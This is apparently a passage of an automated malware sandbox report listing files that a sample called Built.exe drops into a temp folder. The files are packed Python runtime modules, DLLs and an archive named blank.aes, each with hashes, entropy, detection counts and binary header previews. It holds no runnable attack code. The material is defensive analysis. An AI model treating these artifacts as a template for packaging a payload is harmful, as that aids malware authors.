                                                                                                                                                                                                                                                      • Filename: Discord_SiteLink.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: client11.png.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: PCuK01wybv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49944
                                                                                                                                                                                                                                                      Entropy (8bit):7.794461012406033
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:tA0qhtL6ugh0BoGmZ0zlTUjZomYtgHQmchmz1NqRR0opjsIMCVy0I5YiSyvFAMx7:tAX76ZKBT+jjvQlRnsIMCVyH7SyVx7
                                                                                                                                                                                                                                                      MD5:ADAA3E7AB77129BBC4ED3D9C4ADEE584
                                                                                                                                                                                                                                                      SHA1:21AABD32B9CBFE0161539454138A43D5DBC73B65
                                                                                                                                                                                                                                                      SHA-256:A1D8CE2C1EFAA854BB0F9DF43EBCCF861DED6F8AFB83C9A8B881904906359F55
                                                                                                                                                                                                                                                      SHA-512:B73D3ABA135FB5E0D907D430266754DA2F02E714264CD4A33C1BFDEDA4740BBE82D43056F1A7A85F4A8ED28CB7798693512B6D4CDB899CE65B6D271CF5E5E264
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: Built.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: PCuK01wybv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: SecuriteInfo.com.Python.Packed.59.10217.7860.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d....b.f.........." ...(............Pu....................................................`.............................................H....................0..D..................................................P...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60696
                                                                                                                                                                                                                                                      Entropy (8bit):7.838921842803249
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:XGd2xRPNLaGFQFjd9MuCRL5o1kGIMLPSj7SyKxw:WMxVhFyjd9MDmtIMLPSjr
                                                                                                                                                                                                                                                      MD5:0F090D4159937400DB90F1512FDA50C8
                                                                                                                                                                                                                                                      SHA1:01CBCB413E50F3C204901DFF7171998792133583
                                                                                                                                                                                                                                                      SHA-256:AE6512A770673E268554363F2D1D2A202D0A337BAF233C3E63335026D223BE31
                                                                                                                                                                                                                                                      SHA-512:151156A28D023CF68FD38CBECBE1484FC3F6BF525E7354FCCED294F8E479E07453FD3FC22A6B8D049DDF0AD6306D2C7051ECE4E7DE1137578541A9AABEFE3F12
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d...eb.f.........." ...(.....................................................P............`.........................................HL.......I.......@.......................L...................................... :..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_decimal.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):110360
                                                                                                                                                                                                                                                      Entropy (8bit):7.933674633852228
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:ATZr2oqnOtykg54lBjYOI6T+62Mnaf9KLKuV8obLFWaIMOqM7ZdD:qonr9SlB0vsNfaluLH/8/7XD
                                                                                                                                                                                                                                                      MD5:A592BA2BB04F53B47D87B4F7B0C8B328
                                                                                                                                                                                                                                                      SHA1:CA8C65AB0AAB0F98AF8CC1C1CF31C9744E56A33C
                                                                                                                                                                                                                                                      SHA-256:19FE4A08B0B321FF9413DA88E519F4A4A4510481605B250F2906A32E8BB14938
                                                                                                                                                                                                                                                      SHA-512:1576FDC90D8678DA0DAB8253FDD8EC8B3CE924FA392F35D8C62207A85C31C26DAE5524E983E97872933538551CBEF9CD4BA9206BCD16F2AE0858AB11574D09E0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d...[b.f.........." ...(.p...................................................@............`..........................................<..P....9.......0...........&...........=.......................................+..@...........................................UPX0....................................UPX1.....p.......n..................@....rsrc........0.......r..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36632
                                                                                                                                                                                                                                                      Entropy (8bit):7.673459345767737
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:9ZxZoP6y3dGOWmmDFYCppejnIMOInQ5YiSyvqAMxkEq:91jOWpDFujnIMOInC7SyAx2
                                                                                                                                                                                                                                                      MD5:4DD4C7D3A7B954A337607B8B8C4A21D1
                                                                                                                                                                                                                                                      SHA1:B6318B830D73CBF9FA45BE2915F852B5A5D81906
                                                                                                                                                                                                                                                      SHA-256:926692FCECDB7E65A14AC0786E1F58E880EA8DAE7F7BB3AA7F2C758C23F2AF70
                                                                                                                                                                                                                                                      SHA-512:DAB02496C066A70A98334E841A0164DF1A6E72E890CE66BE440B10FDEECDFE7B8D0EC39D1AF402AE72C8AA19763C92DD7404F3A829C9FDCF871C01B1AED122E1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8QtZY?'ZY?'ZY?'S!.'^Y?'..>&XY?'..<&YY?'..;&RY?'..:&VY?'.!>&XY?'O.>&_Y?'ZY>'.Y?'O.2&[Y?'O.?&[Y?'O..'[Y?'O.=&[Y?'RichZY?'........PE..d....b.f.........." ...(.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):88344
                                                                                                                                                                                                                                                      Entropy (8bit):7.925386593593091
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:IGMIb+tRn8VHPoUBL9ZEL7qzf7+pW4AHjI1xh4hBpOVIMZ1JM7Syqxy:oWgRsHPoUVwqzf7+mHjWxGUIMZ1JML
                                                                                                                                                                                                                                                      MD5:17082C94B383BCA187EB13487425EC2C
                                                                                                                                                                                                                                                      SHA1:517DF08AF5C283CA08B7545B446C6C2309F45B8B
                                                                                                                                                                                                                                                      SHA-256:DDBFEF8DA4A0D8C1C8C24D171DE65B9F4069E2EDB8F33EF5DFECF93CB2643BD4
                                                                                                                                                                                                                                                      SHA-512:2B565D595E9A95AEFAE396FC7D66EE0AEB9BFE3C23D64540BA080BA39A484AB1C50F040161896CCA6620C182F0B02A9DB677DAB099DCA3CAE863E6E2542BB12C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d....b.f.........." ...(. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26904
                                                                                                                                                                                                                                                      Entropy (8bit):7.472682734205639
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:pX+wITsyt4xW6MwmTMp5HIMQUnH5YiSyvMcAMxkEm2j:Mj4z7YqHIMQUnZ7SyVxb
                                                                                                                                                                                                                                                      MD5:97CC5797405F90B20927E29867BC3C4F
                                                                                                                                                                                                                                                      SHA1:A2E7D2399CCA252CC54FC1609621D441DFF1ACE5
                                                                                                                                                                                                                                                      SHA-256:FB304CA68B41E573713ABB012196EF1AE2D5B5E659D846BBF46B1F13946C2A39
                                                                                                                                                                                                                                                      SHA-512:77780FE0951473762990CBEF056B3BBA36CDA9299B1A7D31D9059A792F13B1A072CE3AB26D312C59805A7A2E9773B7300B406FD3AF5E2D1270676A7862B9CA48
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d...`b.f.........." ...(.0.......... .....................................................`.............................................L.......P............`..............<....................................... ...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):45336
                                                                                                                                                                                                                                                      Entropy (8bit):7.718752299192271
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zN6akbHvkpgRFeTWraC7I5ubIFpoO5IMLwyBu5YiSyvYEAMxkEIWN:z8akHrRFeTWrdI5uMoO5IMLwyBE7Sygs
                                                                                                                                                                                                                                                      MD5:F52C1C015FB147729A7CAAB03B2F64F4
                                                                                                                                                                                                                                                      SHA1:8AEBC2B18A02F1C6C7494271F7F9E779014BEE31
                                                                                                                                                                                                                                                      SHA-256:06D91AC02B00A29180F4520521DE2F7DE2593DD9C52E1C2B294E717C826A1B7D
                                                                                                                                                                                                                                                      SHA-512:8AB076C551F0A6FFE02C26B4F0FBB2EA7756D4650FE39F53D7BD61F4CB6AE81460D46D8535C89C6D626E7C605882B39843F7F70DD50E9DAF27AF0F8CADD49C0F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d....b.f.........." ...(.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):59160
                                                                                                                                                                                                                                                      Entropy (8bit):7.857087754447377
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:f063sNIsNgSIOB2nMCbGV5SQpvX8Fyi6sdSIMOQif7SyJxl:fLHr4VD7dv8r6s0IMOQif3
                                                                                                                                                                                                                                                      MD5:37A88A19BB1DE9CF33141872C2C534CB
                                                                                                                                                                                                                                                      SHA1:A9209EC10AF81913D9FD1D0DD6F1890D275617E8
                                                                                                                                                                                                                                                      SHA-256:CCA0FBE5268AB181BF8AFBDC4AF258D0FBD819317A78DDD1F58BEF7D2F197350
                                                                                                                                                                                                                                                      SHA-512:3A22064505B80B51EBAA0D534F17431F9449C8F2B155EC794F9C4F5508470576366ED3BA5D2DE7DDF1836C6E638F26CAD8CB0CC496DAF30EE38CA97557238733
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M..#..#..#.....#..1"..#..1..#..1 ..#..1'...#..1&..#..6"..#..."..#.."..#..6....#..6#..#..6..#..6!..#.Rich.#.........................PE..d....b.f.........." ...(.........p..`........................................@............`..........................................;..P....9.......0..........D............;......................................`&..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):67864
                                                                                                                                                                                                                                                      Entropy (8bit):7.8470211975704105
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:BzC9S4THQvkF5SM7f8bQMAjsNVw3daUjNIMC7Z1s7SyS6xT:BspTRf8ejsNWRIMC7ZSD
                                                                                                                                                                                                                                                      MD5:34402EFC9A34B91768CF1280CC846C77
                                                                                                                                                                                                                                                      SHA1:20553A06FE807C274B0228EC6A6A49A11EC8B7C1
                                                                                                                                                                                                                                                      SHA-256:FE52C34028C5D62430EA7A9BE034557CCFECDDDDA9C57874F2832F584FEDB031
                                                                                                                                                                                                                                                      SHA-512:2B8A50F67B5D29DB3E300BC0DD670DAD0BA069AFA9ACF566CAD03B8A993A0E49F1E28059737D3B21CEF2321A13EFF12249C80FA46832939D2BF6D8555490E99C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..j8.98.98.91.09>.9._.8:.9._.8;.9._.80.9._.85.9-X.8>.98.9..9s..8?.9-X.8:.9-X.89.9-X\99.9-X.89.9Rich8.9........................PE..d....b.f.........." ...(.........@.......P...................................0............`.........................................l,..d....)....... ..........P............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\base_library.zip

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1332808
                                                                                                                                                                                                                                                      Entropy (8bit):5.586991005048339
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:rclJGUq/aLmn9vc+fYNXPh26UZWAzbX7jg/yquPxQh/dmFP/H71dlt/RO2/HUQ:rclJGUza9zb/gXOQ/dmFPvL3g2/HUQ
                                                                                                                                                                                                                                                      MD5:21BF7B131747990A41B9F8759C119302
                                                                                                                                                                                                                                                      SHA1:70D4DA24B4C5A12763864BF06EBD4295C16092D9
                                                                                                                                                                                                                                                      SHA-256:F36454A982F5665D4E7FCC69EE81146965358FCB7F5D59F2CD8861CA89C66EFA
                                                                                                                                                                                                                                                      SHA-512:4CB45E9C48D4544C1A171D88581F857D8C5CF74E273BB2ACF40A50A35C5148FE7D6E9AFCF5E1046A7D7AE77F9196F7308AE3869C18D813FCD48021B4D112DEB5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PK..........!.LX. S...S......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\blank.aes

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):114183
                                                                                                                                                                                                                                                      Entropy (8bit):7.7316094706626055
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:j9JWMe9V1quXf8klMY1qlTGuvyshFfRylZcYDQLdE3xiMUEDmzxuaaLhbw4equL7:XCA0bNgLX5IKEPszxuaalUpqnhVFq
                                                                                                                                                                                                                                                      MD5:199E82F01D57DFEC6DED77B4AF09D9DC
                                                                                                                                                                                                                                                      SHA1:98D48C1AF042E2D9EE1FFAF3C479ED156CCE7739
                                                                                                                                                                                                                                                      SHA-256:4BC7A6F6F517EDE6FE3032E6CF05B8EA7187847FF4C55FA12320BCACDC899378
                                                                                                                                                                                                                                                      SHA-512:A18B384DE5ABC1329237E518E005EFA859CA47025CA78A6720F2E6566F22A4943DAE689955C0029FE525C360E0D7B4CBAA05C30AACB375D8E7E8C201BB07E281
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PK........UdiY..............stub-o.pyc.........,/g.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\libcrypto-3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1630488
                                                                                                                                                                                                                                                      Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                                      MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                                      SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                                      SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                                      SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\libffi-8.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):29968
                                                                                                                                                                                                                                                      Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                                      MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                                      SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                                      SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                                      SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\libssl-3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):227096
                                                                                                                                                                                                                                                      Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                                      MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                                      SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                                      SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                                      SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\python312.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1808664
                                                                                                                                                                                                                                                      Entropy (8bit):7.993757523155339
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:24576:xKveD1e+vwrto8RBt0I7Y2OCQNGucXFIRJQmThODxHtSRi+++q+nSWACTpoYqtOU:e+vyhC+vgNGtUth6SRijWAdY7bpX/YCy
                                                                                                                                                                                                                                                      MD5:6F7C42579F6C2B45FE866747127AEF09
                                                                                                                                                                                                                                                      SHA1:B9487372FE3ED61022E52CC8DBD37E6640E87723
                                                                                                                                                                                                                                                      SHA-256:07642B6A3D99CE88CFF790087AC4E2BA0B2DA1100CF1897F36E096427B580EE5
                                                                                                                                                                                                                                                      SHA-512:AADF06FD6B4E14F600B0A614001B8C31E42D71801ADEC7C9C177DCBB4956E27617FA45BA477260A7E06D2CA4979ED5ACC60311258427EE085E8025B61452ACEC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
